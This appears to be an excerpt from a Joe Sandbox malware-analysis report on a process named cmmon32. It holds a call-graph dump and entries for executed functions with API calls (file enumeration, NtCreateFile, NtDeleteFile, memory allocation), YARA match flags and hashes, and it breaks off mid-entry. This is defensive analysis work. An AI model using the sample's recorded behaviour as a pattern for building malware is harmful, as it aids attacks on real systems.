34285 27d3cb0 11 API calls 34231->34285 34235 27dabde 34234->34235 34236 27dabe5 34234->34236 34235->34213 34237 27cb150 LdrLoadDll 34236->34237 34238 27dac17 34237->34238 34239 27dac26 34238->34239 34286 27da6c0 LdrLoadDll 34238->34286 34240 27de3b0 2 API calls 34239->34240 34261 27dae09 34239->34261 34242 27dac3f 34240->34242 34243 27dadb8 34242->34243 34244 27dac54 34242->34244 34242->34261 34245 27dae5b 34243->34245 34246 27dadc2 34243->34246 34287 27d3800 LdrLoadDll 34244->34287 34248 27de2d0 2 API calls 34245->34248 34288 27d3800 LdrLoadDll 34246->34288 34248->34261 34250 27dac6b 34254 27d7760 LdrLoadDll 34250->34254 34251 27dadd9 34289 27d9ff0 LdrLoadDll 34251->34289 34253 27dadef 34256 27d7760 LdrLoadDll 34253->34256 34255 27dac87 34254->34255 34257 27d7760 LdrLoadDll 34255->34257 34256->34261 34258 27daca3 34257->34258 34259 27d7760 LdrLoadDll 34258->34259 34260 27dacc2 34259->34260 34262 27d7760 LdrLoadDll 34260->34262 34261->34213 34263 27dacde 34262->34263 34264 27d7760 LdrLoadDll 34263->34264 34265 27dacfa 34264->34265 34266 27d7760 LdrLoadDll 34265->34266 34267 27dad19 34266->34267 34268 27d7760 LdrLoadDll 34267->34268 34269 27dad35 34268->34269 34270 27d7760 LdrLoadDll 34269->34270 34271 27dad58 34270->34271 34271->34261 34272 27de2d0 2 API calls 34271->34272 34273 27dadac 34272->34273 34273->34213 34275 27d7350 10 API calls 34274->34275 34276 27d3736 34275->34276 34277 27d3743 34276->34277 34278 27d7350 10 API calls 34276->34278 34277->34226 34279 27d3754 34278->34279 34279->34277 34280 27d7350 10 API calls 34279->34280 34281 27d376c 34280->34281 34282 27de2d0 2 API calls 34281->34282 34283 27d3776 34282->34283 34283->34226 34284->34230 34285->34231 34286->34239 34287->34250 34288->34251 34289->34253 34291 27d31c9 34290->34291 34292 27d7760 LdrLoadDll 34291->34292 34293 27d3206 34292->34293 34294 27d7760 LdrLoadDll 34293->34294 34295 27d3224 34294->34295 34296 27d7760 LdrLoadDll 34295->34296 34298 27d3246 34296->34298 34297 27d32cc 34297->34009 34298->34297 34299 27d3270 FindFirstFileW 34298->34299 34299->34297 34300 27d328b 34299->34300 34301 27d32b3 FindNextFileW 34300->34301 34304 27d3080 13 API calls 34300->34304 34301->34300 34303 27d32c5 FindClose 34301->34303 34303->34297 34304->34300 34305->34052 34307 27daa86 34306->34307 34309 27dab86 34306->34309 34308 27d7350 10 API calls 34307->34308 34307->34309 34308->34307 34309->34065 34310->34065 34311->34065 34313 27d0cf5 34312->34313 34314 27cb4a0 LdrLoadDll 34313->34314 34315 27d0d5a 34314->34315 34316 27cb4a0 LdrLoadDll 34315->34316 34317 27d0da8 34316->34317 34318 27ce7a0 2 API calls 34317->34318 34319 27d0def 34318->34319 34320 27d0df6 34319->34320 34321 27dabd0 3 API calls 34319->34321 34320->34071 34323 27d0e04 34321->34323 34322 27d0e0d 34322->34071 34323->34322 34324 27cb4a0 LdrLoadDll 34323->34324 34326 27d0e5c 34324->34326 34325 27daa70 10 API calls 34325->34326 34326->34325 34328 27d0ee1 34326->34328 34346 27d0410 34326->34346 34330 27d0f39 34328->34330 34357 27d0770 34328->34357 34331 27de2d0 2 API calls 34330->34331 34332 27d0f40 34331->34332 34332->34071 34334 27d09c6 34333->34334 34344 27d09d1 34333->34344 34335 27de3b0 2 API calls 34334->34335 34335->34344 34336 27d09e7 34336->34073 34337 27ce7a0 2 API calls 34337->34344 34338 27d0ca0 34339 27d0cb9 34338->34339 34340 27de2d0 2 API calls 34338->34340 34339->34073 34340->34339 34341 27daa70 10 API calls 34341->34344 34342 27d0410 11 API calls 34342->34344 34343 27cb4a0 LdrLoadDll 34343->34344 34344->34336 34344->34337 34344->34338 34344->34341 34344->34342 34344->34343 34345 27d0770 10 API calls 34344->34345 34345->34344 34347 27d0436 34346->34347 34348 27d7350 10 API calls 34347->34348 34349 27d0492 34348->34349 34350 27d3720 10 API calls 34349->34350 34351 27d049d 34350->34351 34353 27d0620 34351->34353 34355 27d04bb 34351->34355 34352 27d0605 34352->34326 34353->34352 34354 27d02e0 11 API calls 34353->34354 34354->34353 34355->34352 34363 27d02e0 34355->34363 34358 27d0796 34357->34358 34359 27d7350 10 API calls 34358->34359 34360 27d0807 34359->34360 34361 27d3720 10 API calls 34360->34361 34362 27d0812 34361->34362 34362->34328 34364 27d02f6 34363->34364 34367 27d3b90 34364->34367 34366 27d03fe 34366->34355 34368 27d3bcd 34367->34368 34369 27d3c7d 34368->34369 34370 27d4b70 11 API calls 34368->34370 34371 27d3c20 34368->34371 34369->34366 34370->34371 34372 27d3c59 34371->34372 34373 27de2d0 LdrLoadDll RtlFreeHeap 34371->34373 34372->34366 34373->34372 34374->33873 34375->33884 34376->33882 34377->33876 34378 27df569 34379 27df50a 34378->34379 34383 27df58e 34378->34383 34380 27df570 34379->34380 34381 27df51a 34379->34381 34382 27de3b0 2 API calls 34379->34382 34384 27de2d0 2 API calls 34381->34384 34382->34381 34385 27df53d 34384->34385 34386 27c9710 34387 27c9735 34386->34387 34388 27cb150 LdrLoadDll 34387->34388 34389 27c9768 34388->34389 34390 27ccd00 3 API calls 34389->34390 34391 27c978d 34389->34391 34390->34391 34392 27db490 34393 27de250 2 API calls 34392->34393 34395 27db4cb 34393->34395 34394 27db5c6 34395->34394 34396 27cb150 LdrLoadDll 34395->34396 34397 27db50b 34396->34397 34398 27d7760 LdrLoadDll 34397->34398 34400 27db530 34398->34400 34399 27db540 Sleep 34399->34400 34400->34394 34400->34399 34403 27db100 LdrLoadDll 34400->34403 34404 27db2e0 LdrLoadDll 34400->34404 34403->34400 34404->34400

                                                            Executed Functions

                                                            Function 027D31A0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 027D3281
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 027D32BE
                                                            • FindClose.KERNELBASE(?), ref: 027D32C9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: e13910eb82a3534bfcb50d39b5d44c1b03ce3959003819a512da7cbca0061273
                                                            • Instruction ID: 746ad3cb378af041236a2c7c0bc1f172ed788d3578c0f2739b20604ac4f99da0
                                                            • Opcode Fuzzy Hash: e13910eb82a3534bfcb50d39b5d44c1b03ce3959003819a512da7cbca0061273
                                                            • Instruction Fuzzy Hash: FF31B4B1D002497BEB21EB60CC84FEF777DDF84714F104498B909A6181DA70AA858FA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC73B Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,027D74BC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027D74BC,?,00000000,00000060,00000000,00000000), ref: 027DC78D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction ID: f57cfeb53dc803803195830d1d35a5d38930efb5671085cec104f71d4aee01d9
                                                            • Opcode Fuzzy Hash: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction Fuzzy Hash: 0401CFB2210108AFCB18DF98DC84EEB77AEAF8C354F058248BA0DD7244C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC740 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,027D74BC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027D74BC,?,00000000,00000060,00000000,00000000), ref: 027DC78D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction ID: d093f355977989d56694bc0ed0399e2a832d67cd9d89159b2457ae7149efe478
                                                            • Opcode Fuzzy Hash: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction Fuzzy Hash: 38F07FB2215208AFCB58DF89DC85EEB77EDAF8C754F158248BA0D97241D630F851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC7EA Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(027D7680,027D2B50,FFFFFFFF,027D717A,00000002,?,027D7680,00000002,027D717A,FFFFFFFF,027D2B50,027D7680,00000002,00000000), ref: 027DC835
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction ID: dd169fc9a9a9aeeb478597bdf1df8dbfd3e5e8b93a5b24f03b6378a82cf644ae
                                                            • Opcode Fuzzy Hash: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction Fuzzy Hash: 69F0A4B6204108AFCB14DF99DC94EEB77AAAF8C754F158249BA4DD7640D630E8118BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC7F0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(027D7680,027D2B50,FFFFFFFF,027D717A,00000002,?,027D7680,00000002,027D717A,FFFFFFFF,027D2B50,027D7680,00000002,00000000), ref: 027DC835
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction ID: d1fc5c7791c5f5bd8dded31f241f19fe7e312fd9b2a272a17b88162a84b4fe31
                                                            • Opcode Fuzzy Hash: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction Fuzzy Hash: 02F0B2B2210208AFCB14DF99DC84EEB77ADEF8C754F118248BE0DA7241D630E811CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC920 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,027C17C4,00000004,00001000,00000000), ref: 027DC959
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction ID: 743f04878c3dbdb859a75713d6161858b0dbc62298b6ef153dbab012d598b82f
                                                            • Opcode Fuzzy Hash: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction Fuzzy Hash: 0BF0AEB6210218ABCB18EF89DC85EAB77ADAF88754F118159BE0997241C630F911CBB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC870 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(027CE525,00000000,?,027CE525,?,?,?,?,?,?,?,00000000,?,00000000), ref: 027DC895
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
                                                            • Instruction ID: e8bf81e21b33febc344093a2747bac5a80b982915da83a46d1b62be79981393b
                                                            • Opcode Fuzzy Hash: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
                                                            • Instruction Fuzzy Hash: 64D01772240214ABD620EBA8DC89E9B7BADDF88660F018459BA1D5B242C530FA008AE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 027DC840 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtDeleteFile.NTDLL(027D7482,00000002,?,027D7482,00000000,00000018,?,?,67F1BF61,00000000,?), ref: 027DC865
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: cb34cefa210aad1f2cd63b2e285f7a812f4a18ab9f97dea6380d9b3a81b756c1
                                                            • Instruction ID: 0d76c3b6f66553f012dd43e79a685940fc61365428461009ed32d49194fdaf63
                                                            • Opcode Fuzzy Hash: cb34cefa210aad1f2cd63b2e285f7a812f4a18ab9f97dea6380d9b3a81b756c1
                                                            • Instruction Fuzzy Hash: 8BD01772240214ABD620EB98DC89ED77BACDF88760F018455BA1D5B241C630FA008BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
                                                            • Instruction ID: b29610b91f9d3869451dfa8c52bd01758d00146856da6b81399bce423772e05a
                                                            • Opcode Fuzzy Hash: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
                                                            • Instruction Fuzzy Hash: DF900265261004032105A559070450701A6A7D5797751C021F1006650CD661D8757161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 67cf538b0b95da6cf89e9b1ce37bd5898c9ddf7226562b36240e6a2ca7feb6c0
                                                            • Instruction ID: 06b89f871a0971c9b6b8fe45c2d93a44c48b47a02cfacbf3a1f71c930e900ef3
                                                            • Opcode Fuzzy Hash: 67cf538b0b95da6cf89e9b1ce37bd5898c9ddf7226562b36240e6a2ca7feb6c0
                                                            • Instruction Fuzzy Hash: 6A900265271004022145A559060450B05A5B7D6797791C015F1407690CC661D8797361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045295D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
                                                            • Instruction ID: 0bc1ff4937e3ba340e7f1edb299a920f3251ced99a3d805916b077b2d53932e2
                                                            • Opcode Fuzzy Hash: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
                                                            • Instruction Fuzzy Hash: 5C9002A125200403610571594414616416AA7E0647F51C021E1005690DC565D8A57165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d31952984ae06274cfad80e1082a960d3fa5ef75f1006515c03640eb791fcd2f
                                                            • Instruction ID: 336e4ed7a3b6e7742ae7074724a0b7253fbb49886378e8bc8e5b7111a24fd116
                                                            • Opcode Fuzzy Hash: d31952984ae06274cfad80e1082a960d3fa5ef75f1006515c03640eb791fcd2f
                                                            • Instruction Fuzzy Hash: 3E90027125504C42F14071594404A460175A7D074BF51C011A0055794D9665DD69B6A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a57ee7e5b50d91a9f6d601ab951dfa3fcd6e3c4196d2e573192ffafcee0b5c47
                                                            • Instruction ID: 7dc497eaff9677bc7d1b56e9431d72fcf7187e7104dae95472cffe8082b36ed9
                                                            • Opcode Fuzzy Hash: a57ee7e5b50d91a9f6d601ab951dfa3fcd6e3c4196d2e573192ffafcee0b5c47
                                                            • Instruction Fuzzy Hash: E990027125100C02F1807159440464A0165A7D1747F91C015A0016754DCA55DA6D77E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 26ac796da86bd39976a67a3ec15253b975b8dd263972ef7ac24cac1766100e2b
                                                            • Instruction ID: 7c538085eb4296221452ff7a34a9fedebe0ca31360a61fc82e0165b4930ad55b
                                                            • Opcode Fuzzy Hash: 26ac796da86bd39976a67a3ec15253b975b8dd263972ef7ac24cac1766100e2b
                                                            • Instruction Fuzzy Hash: 3990027165500C02F150715944147460165A7D0747F51C011A0015754D8795DA6976E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045296D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
                                                            • Instruction ID: 889d0e15bb47f286039b010a476c14fea61578d6442d5a2f9f29d4a3dcbbceb2
                                                            • Opcode Fuzzy Hash: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
                                                            • Instruction Fuzzy Hash: DE90027125100C42F10061594404B460165A7E0747F51C016A0115754D8655D8657561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
                                                            • Instruction ID: 4e10ca3a3fe42c049bad4bdfb89407ca5306be41b1c0c4dd460edf60ae3592d2
                                                            • Opcode Fuzzy Hash: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
                                                            • Instruction Fuzzy Hash: 8690027125108C02F1106159840474A0165A7D0747F55C411A4415758D86D5D8A57161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
                                                            • Instruction ID: 7a6e8ab3648808f6f4ac5afd6173953cf8fad3d23d233fd5c3e394cab7571a06
                                                            • Opcode Fuzzy Hash: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
                                                            • Instruction Fuzzy Hash: 7390027125100802F100659954086460165A7E0747F51D011A5015655EC6A5D8A57171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
                                                            • Instruction ID: 59eafbbb9058fa4b32c821a5ab0951fdf15b27addcdce71b2efaeab1c22176fa
                                                            • Opcode Fuzzy Hash: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
                                                            • Instruction Fuzzy Hash: 5790027136114802F110615984047060165A7D1647F51C411A0815658D86D5D8A57162
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: true
                                                            • Associated: 00000005.00000002.505725173.00000000045DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_44c0000_cmmon32.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
                                                            • Instruction ID: 91b6eda25b6555d9c98beaf2d46df3b50950170664e9ff8f8351f0c14f28c05c
                                                            • Opcode Fuzzy Hash: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
                                                            • Instruction Fuzzy Hash: 1490026926300402F1807159540860A0165A7D1647F91D415A0006658CC955D87D7361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04529840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
